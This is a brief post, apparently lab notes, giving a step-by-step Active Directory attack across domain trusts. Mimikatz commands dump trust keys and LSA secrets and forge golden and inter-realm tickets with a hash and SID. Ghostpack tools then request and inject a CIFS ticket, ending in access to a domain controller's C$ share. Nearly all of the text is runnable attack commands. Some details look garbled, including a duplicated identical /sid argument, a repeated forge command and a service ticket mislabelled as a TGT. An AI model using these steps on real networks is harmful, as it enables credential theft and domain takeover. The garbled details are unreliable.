Privilege Escalation Across Trust

Priv esc across domains : trust tickets:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::trust /patch”‘

An inter-realm TGT can be forged:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi”‘

Gets a TGT for a service (CIFS below) in the target domain by using the forged trust ticket.

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> asktgs.exe C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration\ticket.kirbi CIFS/WIN-2RUMVG5JPOC.security.local

Use the TGS to access the targeted service:

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> .\kirbikator.exe lsa .\CIFS.WIN-2RUMVG5JPOC.security.local.kirbi

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> ls \\WIN-2RUMVG5JPOC.security.local

PRIV ESC Across domain: KRBTGT HASH:

SID history once again:

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> Invoke-Mimikatz -Command ‘”lsadump::lsa /patch”‘

PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> Invoke-Mimikatz -Command ‘”kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi”‘

On a machine of security domain :

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::ptt ticket.kirbi”‘

We now have Enterprise Admin privileges:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration>ls //WIN-2RUMVG5JPOC.security.local\c$

@Saksham Dixit